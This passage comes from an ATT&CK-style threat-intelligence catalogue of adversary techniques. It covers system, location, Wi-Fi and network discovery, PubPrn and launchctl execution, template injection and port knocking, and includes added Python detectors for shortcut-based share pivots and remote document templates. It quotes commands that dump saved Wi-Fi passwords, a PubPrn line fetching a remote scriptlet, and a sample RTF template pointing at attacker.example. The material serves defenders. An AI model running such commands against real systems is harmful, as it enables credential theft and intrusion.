There are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Query Registry](https://app.tidalcyber.com/technique/58722f84-b119-45a8-8e29-0065688015ee) and calls to [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions.<sup>[[CrowdStrike Ryuk January 2019](https://app.tidalcyber.com/references/df471757-2ce0-48a7-922f-a84c57704914)]</sup>

For example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\Language</code> or parsing the outputs of Windows API functions <code>GetUserDefaultUILanguage</code>, <code>GetSystemDefaultUILanguage</code>, <code>GetKeyboardLayoutList</code> and <code>GetUserDefaultLangID</code>.<sup>[[Darkside Ransomware Cybereason](https://app.tidalcyber.com/references/eded380e-33e9-4fdc-8e1f-b51d650b9731)]</sup><sup>[[Securelist JSWorm](https://app.tidalcyber.com/references/c29ca9f2-1e48-4913-b10b-15e558868ed8)]</sup><sup>[[SecureList SynAck Doppelgänging May 2018](https://app.tidalcyber.com/references/d9f0af0f-8a65-406b-9d7e-4051086ef301)]</sup>

On a macOS or Linux system, adversaries may query <code>locale</code> to retrieve the value of the <code>$LANG</code> environment variable.

The tag is: misp-galaxy:technique="System Language Discovery"

System Location Discovery

Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://app.tidalcyber.com/technique/90e6a093-3e87-4d74-8b68-38c7d7e5e93c) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.<sup>[[FBI Ragnar Locker 2020](https://app.tidalcyber.com/references/38b9b8a3-6fd3-4650-9192-14ee3f302705)]</sup><sup>[[Sophos Geolocation 2016](https://app.tidalcyber.com/references/a3b7540d-20cc-4d94-8321-9fd730486f8c)]</sup><sup>[[Bleepingcomputer RAT malware 2020](https://app.tidalcyber.com/references/a587ea99-a951-4aa8-a3cf-a4822ae97490)]</sup> Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.<sup>[[FBI Ragnar Locker 2020](https://app.tidalcyber.com/references/38b9b8a3-6fd3-4650-9192-14ee3f302705)]</sup> In cloud environments, an instance’s availability zone may also be discovered by accessing the instance metadata service from the instance.<sup>[[AWS Instance Identity Documents](https://app.tidalcyber.com/references/efff0080-59fc-4ba7-ac91-771358f68405)]</sup><sup>[[Microsoft Azure Instance Metadata 2021](https://app.tidalcyber.com/references/66e93b75-0067-4cdb-b695-8f8109ef26e0)]</sup>

Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.<sup>[[Securelist Trasparent Tribe 2020](https://app.tidalcyber.com/references/0db470b1-ab22-4b67-a858-472e4de7c6f0)]</sup><sup>[[Sophos Geolocation 2016](https://app.tidalcyber.com/references/a3b7540d-20cc-4d94-8321-9fd730486f8c)]</sup>

The tag is: misp-galaxy:technique="System Location Discovery"

Internet Connection Discovery

Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://app.tidalcyber.com/software/4ea12106-c0a1-4546-bb64-a1675d9f5dc7), <code>tracert</code>, and GET requests to websites.

Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.

The tag is: misp-galaxy:technique="Internet Connection Discovery"

Wi-Fi Discovery

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://app.tidalcyber.com/technique/6736995e-b9ea-401b-81fa-6caeb7a17ce3), [Remote System Discovery](https://app.tidalcyber.com/technique/00a9a4d4-928d-4d95-be31-dfac6103991f), and other discovery or [Credential Access](https://app.tidalcyber.com/tactics/0c3132d5-c0df-4793-b5f2-1a95bd64ab53) activity to support both ongoing and future campaigns.

Adversaries may collect various types of information about Wi-Fi networks from hosts. For example, on Windows the names and passwords of all Wi-Fi networks a device has previously connected to may be available through <code>netsh wlan show profiles</code> to enumerate Wi-Fi names and then <code>netsh wlan show profile "Wi-Fi name" key=clear</code> to show a Wi-Fi network's corresponding password.<sup>[[BleepingComputer Agent Tesla steal wifi passwords](https://app.tidalcyber.com/references/93b5ecd2-35a3-5bd8-9d6e-87bace012546)]</sup><sup>[[Malware Bytes New AgentTesla variant steals WiFi credentials](https://app.tidalcyber.com/references/b61b7db6-ed0d-546d-b1e0-c2630530975b)]</sup><sup>[[Check Point APT35 CharmPower January 2022](https://app.tidalcyber.com/references/81dce660-93ea-42a4-902f-0c6021d30f59)]</sup> Additionally, names and other details of locally reachable Wi-Fi networks can be discovered using calls to <code>wlanAPI.dll</code> [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions.<sup>[[Binary Defense Emotes Wi-Fi Spreader](https://app.tidalcyber.com/references/05e624ee-c53d-5cd1-8fd2-6b2d38344bfd)]</sup>

On Linux, the names and passwords of all Wi-Fi networks a device has previously connected to may be available in files under <code>/etc/NetworkManager/system-connections/</code>.<sup>[[Wi-Fi Password of All Connected Networks in Windows/Linux](https://app.tidalcyber.com/references/7005f62f-0239-56c7-964b-64384e17b8da)]</sup> On macOS, the password of a known Wi-Fi network may be identified with <code>security find-generic-password -wa wifiname</code> (requires an admin username/password).<sup>[[Find Wi-Fi Password on Mac](https://app.tidalcyber.com/references/695f3d20-7a46-5a4a-aef0-0a05a5e35304)]</sup>

The tag is: misp-galaxy:technique="Wi-Fi Discovery"

System Network Configuration Discovery

Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://app.tidalcyber.com/software/45b51950-6190-4572-b1a2-7c69d865251e), ipconfig/[ifconfig](https://app.tidalcyber.com/software/93ab16d1-625e-4b1c-bb28-28974c269c47), [nbtstat](https://app.tidalcyber.com/software/81c2fc9b-8c2c-40f6-a327-dcdd64b70a7e), and [route](https://app.tidalcyber.com/software/3b755518-9085-474e-8bc4-4f9344d9c8af).

Adversaries may also leverage a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[Mandiant APT41 Global Intrusion ](https://app.tidalcyber.com/references/9b75a38e-e5c7-43c8-a7fb-c7f212e00497)]</sup>

Adversaries may use the information from [System Network Configuration Discovery](https://app.tidalcyber.com/technique/adb6b8c1-2bdb-42b9-95da-5ce07e8796f7) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.

The tag is: misp-galaxy:technique="System Network Configuration Discovery"

System Network Connections Discovery

Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.

An adversary who gains access to a system that is part of a cloud-based environment may map out Virtual Private Clouds or Virtual Networks in order to determine what systems and services are connected. The actions performed are likely the same types of discovery techniques depending on the operating system, but the resulting information may include details about the networked cloud environment relevant to the adversary’s goals. Cloud providers may have different ways in which their virtual networks operate.<sup>[[Amazon AWS VPC Guide](https://app.tidalcyber.com/references/7972332d-fbe9-4f14-9511-4298f65f2a86)]</sup><sup>[[Microsoft Azure Virtual Network Overview](https://app.tidalcyber.com/references/bf7f2e7a-f5ae-4b6e-8c90-fd41a92c4615)]</sup><sup>[[Google VPC Overview](https://app.tidalcyber.com/references/9ebe53cf-657f-475d-85e4-9e30f4af1e7d)]</sup> Similarly, adversaries who gain access to network devices may also perform similar discovery activities to gather information about connected systems and services.

Utilities and commands that acquire this information include [netstat](https://app.tidalcyber.com/software/132fb908-9f13-4bcf-aa64-74cbc72f5491), "net use," and "net session" with [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc). In Mac and Linux, [netstat](https://app.tidalcyber.com/software/132fb908-9f13-4bcf-aa64-74cbc72f5491) and <code>lsof</code> can be used to list current connections. <code>who -a</code> and <code>w</code> can be used to show which users are currently logged in, similar to "net session". Additionally, built-in features native to network devices and [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) may be used (e.g. <code>show ip sockets</code>, <code>show tcp brief</code>).<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup>

The tag is: misp-galaxy:technique="System Network Connections Discovery"

System Owner/User Discovery

Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://app.tidalcyber.com/technique/86e6f1f0-290b-4971-b50e-80e98a0a768b) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Various utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.

On network devices, [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as <code>show users</code> and <code>show ssh</code> can be used to display users currently logged into the device.<sup>[[show_ssh_users_cmd_cisco](https://app.tidalcyber.com/references/11d34884-4559-57ad-8910-54e517c6493e)]</sup><sup>[[US-CERT TA18-106A Network Infrastructure Devices 2018](https://app.tidalcyber.com/references/8fdf280d-680f-4b8f-8fb9-6b3118ec3983)]</sup>

The tag is: misp-galaxy:technique="System Owner/User Discovery"

PubPrn

Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://app.tidalcyber.com/technique/0340ed34-6db2-4979-bf73-2c16855867b4) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://app.tidalcyber.com/technique/be095bcc-4769-4010-b2db-3033d01efdbe) via <code>Cscript.exe</code>. For example, the following code publishes a printer within the specified domain: <code>cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com</code>.<sup>[[pubprn](https://app.tidalcyber.com/references/c845c67a-20ab-405c-95fe-2f667f83b886)]</sup>

Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.<sup>[[Enigma0x3 PubPrn Bypass](https://app.tidalcyber.com/references/8b12e87b-3836-4c79-877b-0a2761b34533)]</sup> To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.

In later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).

The tag is: misp-galaxy:technique="PubPrn"

System Script Proxy Execution

Adversaries may use trusted scripts, often signed with certificates, to proxy the execution of malicious files. Several Microsoft signed scripts that have been downloaded from Microsoft or are default on Windows installations can be used to proxy execution of other files.<sup>[[LOLBAS Project](https://app.tidalcyber.com/references/14b1d3ab-8508-4946-9913-17e667956064)]</sup> This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.<sup>[[GitHub Ultimate AppLocker Bypass List](https://app.tidalcyber.com/references/a2fa7fb8-ddba-44cf-878f-448fb2aa6149)]</sup>

The tag is: misp-galaxy:technique="System Script Proxy Execution"

System Service Discovery

Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.

Adversaries may use the information from [System Service Discovery](https://app.tidalcyber.com/technique/e0a347e2-2ac5-458b-ab0f-18d81b6d6055) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

The tag is: misp-galaxy:technique="System Service Discovery"

Launchctl

Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.<sup>[[Launchctl Man](https://app.tidalcyber.com/references/26bd50ba-c359-4804-b574-7ec731b37fa6)]</sup>

Adversaries use launchctl to execute commands and programs as [Launch Agent](https://app.tidalcyber.com/technique/6dbe030c-5f87-4b45-9b6b-5bba2c0fad00)s or [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27)s. Common subcommands include: <code>launchctl load</code>, <code>launchctl unload</code>, and <code>launchctl start</code>. Adversaries can use scripts or manually run the commands <code>launchctl load -w "%s/Library/LaunchAgents/%s"</code> or <code>/bin/launchctl load</code> to execute [Launch Agent](https://app.tidalcyber.com/technique/6dbe030c-5f87-4b45-9b6b-5bba2c0fad00)s or [Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27)s.<sup>[[Sofacy Komplex Trojan](https://app.tidalcyber.com/references/a21be45e-26c3-446d-b336-b58d08df5749)]</sup><sup>[[20 macOS Common Tools and Techniques](https://app.tidalcyber.com/references/3ee99ff4-daf4-4776-9d94-f7cf193c2b0c)]</sup>

The tag is: misp-galaxy:technique="Launchctl"

Service Execution

Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.<sup>[[Microsoft Service Control Manager](https://app.tidalcyber.com/references/00d22c6d-a51a-4107-bf75-53ec3330db92)]</sup> The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc).

[PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.<sup>[[Russinovich Sysinternals](https://app.tidalcyber.com/references/72d27aca-62c5-4e96-9977-c41951aaa888)]</sup> Tools such as [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6) and <code>sc.exe</code> can accept remote servers as arguments and may be used to conduct remote execution.

Adversaries may leverage these mechanisms to execute malicious content. This can be done by executing either a new or a modified service. This technique is the execution used in conjunction with [Windows Service](https://app.tidalcyber.com/technique/31c6dd3c-3eb2-46a9-ab85-9e8e145810a1) during service persistence or privilege escalation.

The tag is: misp-galaxy:technique="Service Execution"

System Services

Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://app.tidalcyber.com/technique/f8aa018b-5134-4201-87f2-e55d20f40b17)), but adversaries can also abuse services for one-time or temporary execution.

The tag is: misp-galaxy:technique="System Services"

System Shutdown/Reboot

Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) (e.g. <code>reload</code>).<sup>[[Microsoft Shutdown Oct 2017](https://app.tidalcyber.com/references/c587f021-596a-4e63-ac51-afa2793a859d)]</sup><sup>[[alert_TA18_106A](https://app.tidalcyber.com/references/26b520dc-5c68-40f4-82fb-366d27fc0c2f)]</sup>

Shutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.

Adversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://app.tidalcyber.com/technique/14a944d3-ab95-40d8-b069-ccc4824ef46d) or [Inhibit System Recovery](https://app.tidalcyber.com/technique/d207c03b-fbe7-420e-a053-339f4650c043), to hasten the intended effects on system availability.<sup>[[Talos Nyetya June 2017](https://app.tidalcyber.com/references/c76e806c-b0e3-4ab9-ba6d-68a9f731f127)]</sup><sup>[[Talos Olympic Destroyer 2018](https://app.tidalcyber.com/references/25a2e179-7abd-4091-8af4-e9d2bf24ef11)]</sup>

The tag is: misp-galaxy:technique="System Shutdown/Reboot"

System Time Discovery

An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. <sup>[[MSDN System Time](https://app.tidalcyber.com/references/5e15e03b-be8b-4f3d-a3ae-0df7a4ecfbec)]</sup><sup>[[Technet Windows Time Service](https://app.tidalcyber.com/references/0d908e07-abc1-40fc-b147-9b9fd483b262)]</sup>

System time information may be gathered in a number of ways, such as with [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) on Windows by performing <code>net time \\hostname</code> to gather the system time on a remote system. The victim’s time zone may also be inferred from the current system time or gathered by using <code>w32tm /tz</code>.<sup>[[Technet Windows Time Service](https://app.tidalcyber.com/references/0d908e07-abc1-40fc-b147-9b9fd483b262)]</sup>

On network devices, [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as <code>show clock detail</code> can be used to see the current time configuration.<sup>[[show_clock_detail_cisco_cmd](https://app.tidalcyber.com/references/a2215813-31b0-5624-92d8-479e7bd1a30b)]</sup>

This information could be useful for performing other techniques, such as executing a file with a Scheduled Task/Job,<sup>[[RSA EU12 They're Inside](https://app.tidalcyber.com/references/8330ab88-9c73-4332-97d6-c1fb95b1a155)]</sup> or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://app.tidalcyber.com/technique/90e6a093-3e87-4d74-8b68-38c7d7e5e93c)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.<sup>[[AnyRun TimeBomb](https://app.tidalcyber.com/references/cd369bf9-80a8-426f-a0aa-c9745b40696c)]</sup>

The tag is: misp-galaxy:technique="System Time Discovery"

Taint Shared Content

Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary’s code on a remote system. Adversaries may use tainted shared content to move laterally.

A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://app.tidalcyber.com/technique/bfde0a09-8109-41e4-b8c9-68fe20e8131b) of directory .LNK files that use [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to look like the real directories, which are hidden through [Hidden Files and Directories](https://app.tidalcyber.com/technique/14e81a2d-9eca-429c-9fb9-08e109de9f6c). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user’s expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. <sup>[[Retwin Directory Share Pivot](https://app.tidalcyber.com/references/027c5274-6b61-447a-9058-edb844f112dd)]</sup>

Adversaries may also compromise shared network directories through binary infections by appending or prepending malicious code to a healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.
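The directory-share pivot described above leaves a recognisable footprint on the share itself: a shortcut named like a sibling directory that has been hidden, whose Shell Link header says it runs a file with arguments rather than opening a folder. The following is an added example (not code from the galaxy or the cited write-up) that walks a share and reports that pattern. <code>build_sample_share()</code> writes a constructed tree whose <code>.lnk</code> files carry only the 76-byte MS-SHLLINK header, which is all this check needs; on POSIX the sample uses a leading dot as the stand-in for the hidden attribute.

```python
"""Scan a share for the directory-share pivot: a .LNK masquerading as a folder.

Added example, not code from the galaxy or the cited write-up. For every
shortcut whose name matches a hidden sibling directory it parses the
Shell Link header (MS-SHLLINK): a decoy has HasArguments set and targets a
file, not a directory. build_sample_share() writes a constructed tree; its
.lnk files carry only the 76-byte header, enough for this check. Hidden
means the FILE_ATTRIBUTE_HIDDEN bit where the OS exposes it, or a leading
dot (the stand-in used by the constructed sample on POSIX).
"""
import os
import struct
import tempfile
from pathlib import Path

LNK_HEADER_SIZE = 76
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # 00021401-0000-0000-C000-000000000046
HAS_ARGUMENTS = 0x00000020           # LinkFlags bit
FILE_ATTRIBUTE_HIDDEN = 0x02         # target FileAttributes bits
FILE_ATTRIBUTE_DIRECTORY = 0x10


def parse_lnk_header(data: bytes):
    """Return (LinkFlags, FileAttributes), or None if this is not a Shell Link."""
    if len(data) < LNK_HEADER_SIZE:
        return None
    size, clsid = struct.unpack_from("<I16s", data, 0)
    if size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        return None
    return struct.unpack_from("<II", data, 20)


def is_hidden(path: Path) -> bool:
    if path.name.startswith("."):
        return True
    return bool(getattr(path.stat(), "st_file_attributes", 0) & FILE_ATTRIBUTE_HIDDEN)


def find_pivot_lnks(root) -> list:
    """(shortcut, shadowed directory) pairs that look like pivot decoys."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        here = Path(dirpath)
        hidden = {d.lstrip("."): here / d for d in dirnames if is_hidden(here / d)}
        for name in filenames:
            if not name.lower().endswith(".lnk") or name[:-4] not in hidden:
                continue
            hdr = parse_lnk_header((here / name).read_bytes())
            if hdr is None:
                continue
            link_flags, file_attrs = hdr
            if link_flags & HAS_ARGUMENTS and not file_attrs & FILE_ATTRIBUTE_DIRECTORY:
                hits.append((str(here / name), str(hidden[name[:-4]])))
    return hits


def make_lnk_header(link_flags: int, file_attrs: int) -> bytes:
    """Constructed header only; a real shortcut continues with IDList, LinkInfo, strings."""
    hdr = bytearray(LNK_HEADER_SIZE)
    struct.pack_into("<I16s", hdr, 0, LNK_HEADER_SIZE, LNK_CLSID)
    struct.pack_into("<II", hdr, 20, link_flags, file_attrs)
    return bytes(hdr)


def build_sample_share() -> str:
    """Constructed share: one decoy shadowing a hidden folder, one benign folder link."""
    root = Path(tempfile.mkdtemp(prefix="share_"))
    (root / ".Finance").mkdir()                                                       # the real folder, hidden
    (root / "Finance.lnk").write_bytes(make_lnk_header(HAS_ARGUMENTS | 0x4, 0x20))   # decoy: file target + arguments
    (root / ".Archive").mkdir()
    (root / "Archive.lnk").write_bytes(make_lnk_header(0x4, FILE_ATTRIBUTE_DIRECTORY))  # benign folder shortcut
    (root / "readme.txt").write_text("constructed sample share\n")
    return str(root)
```

Run <code>find_pivot_lnks()</code> against a mounted share; it only reads the fixed header, so it stays cheap on large trees and does not execute anything it finds.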

The tag is: misp-galaxy:technique="Taint Shared Content"

Template Injection

Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft's Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, .xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are ZIP archives composed of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.<sup>[[Microsoft Open XML July 2017](https://app.tidalcyber.com/references/8145f894-6477-4629-81de-1dd26070ee0a)]</sup>

Properties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.

Adversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.<sup>[[SANS Brian Wiltse Template Injection](https://app.tidalcyber.com/references/8c010c87-865b-4168-87a7-4a24db413def)]</sup> These documents can be delivered via other techniques such as [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) and/or [Taint Shared Content](https://app.tidalcyber.com/technique/58987d0d-2ebf-4783-90ac-5164fe9b9e43) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.<sup>[[Redxorblue Remote Template Injection](https://app.tidalcyber.com/references/bce1cd78-b55e-40cf-8a90-64240db867ac)]</sup> Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.<sup>[[MalwareBytes Template Injection OCT 2017](https://app.tidalcyber.com/references/7ef0ab1f-c7d6-46fe-b489-fab4db623e0a)]</sup>

Adversaries may also modify the <code>*\template</code> control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.<sup>[[Proofpoint RTF Injection](https://app.tidalcyber.com/references/8deb6edb-293f-4b9d-882a-541675864eb5)]</sup><sup>[[Ciberseguridad Decoding malicious RTF files](https://app.tidalcyber.com/references/82d2451b-300f-4891-b1e7-ade53dff1126)]</sup>

This technique may also enable [Forced Authentication](https://app.tidalcyber.com/technique/e732e1d4-fffa-4fc3-b387-47782c821688) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.<sup>[[Anomali Template Injection MAR 2018](https://app.tidalcyber.com/references/3cdeb2a2-9582-4725-a132-6503dbe04e1d)]</sup><sup>[[Talos Template Injection July 2017](https://app.tidalcyber.com/references/175ea537-2a94-42c7-a83b-bec8906ee6b9)]</sup><sup>[[ryhanson phishery SEPT 2016](https://app.tidalcyber.com/references/7e643cf0-5df7-455d-add7-2342f36bdbcb)]</sup>
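Because the injected reference lives in a relationship part rather than in any macro or script, the practical check is to open the package and read those parts directly. The following is an added example (not code from the galaxy or the reports it cites) that lists every external relationship in an OOXML package, narrows to <code>attachedTemplate</code> relationships whose target is a remote URL or UNC path, and applies the equivalent check to the <code>\*\template</code> destination in RTF. <code>build_sample_docx()</code> writes a constructed minimal package and <code>SAMPLE_RTF</code> is a constructed fragment; the host names in them are placeholders.

```python
"""Find remote template references in OOXML and RTF documents.

Added example, not code from the galaxy or the reports it cites. For an OOXML
package it reads every relationship part (*.rels) and returns external
targets, then narrows to attachedTemplate relationships pointing at a remote
URL or UNC path (a local file:///C:... Normal.dotm is not flagged). For RTF it
looks for the \\*\\template destination. build_sample_docx() writes a
constructed minimal package, and SAMPLE_RTF is a constructed fragment.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
# http(s)/ftp URLs, UNC paths, or file:// with a host part (file:///C:... has none)
REMOTE = re.compile(r"^(https?://|ftp://|\\\\|file://[^/])", re.IGNORECASE)


def external_relationships(doc: bytes):
    """Every TargetMode="External" relationship in the package: (part, type, target)."""
    found = []
    with zipfile.ZipFile(io.BytesIO(doc)) as z:
        for part in z.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(part))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if rel.get("TargetMode") == "External":
                    found.append((part, rel.get("Type"), rel.get("Target") or ""))
    return found


def remote_templates(doc: bytes):
    """Attached-template targets that will be fetched from a remote host on open."""
    return [target for _, typ, target in external_relationships(doc)
            if typ == ATTACHED_TEMPLATE and REMOTE.match(target)]


RTF_TEMPLATE = re.compile(rb"\{\\\*\\template\s+([^}]*)\}", re.IGNORECASE)


def rtf_remote_templates(rtf: bytes):
    """\\*\\template destinations in an RTF file that point at a remote resource."""
    dests = [m.group(1).decode("latin-1").strip() for m in RTF_TEMPLATE.finditer(rtf)]
    return [d for d in dests if REMOTE.match(d)]


def build_sample_docx(template_target=None) -> bytes:
    """Constructed minimal .docx; word/_rels/settings.xml.rels carries the template."""
    rels = f'<Relationships xmlns="{PKG_REL_NS}">'
    if template_target:
        rels += (f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                 f'Target="{template_target}" TargetMode="External"/>')
    rels += "</Relationships>"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("_rels/.rels", f'<Relationships xmlns="{PKG_REL_NS}"/>')
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                   '<w:body/></w:document>')
        z.writestr("word/settings.xml",
                   '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
                   'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
                   '<w:attachedTemplate r:id="rId1"/></w:settings>')
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


SAMPLE_RTF = rb"{\rtf1\ansi{\*\template http://attacker.example/t.rtf}{\fonttbl}\par}"
```

<code>external_relationships()</code> is deliberately broader than the template check: hyperlinks, oleObject and frame relationships also appear as external targets, and an analyst usually wants the whole list before deciding which ones are expected for a given document.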

The tag is: misp-galaxy:technique="Template Injection"

Port Knocking

Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.

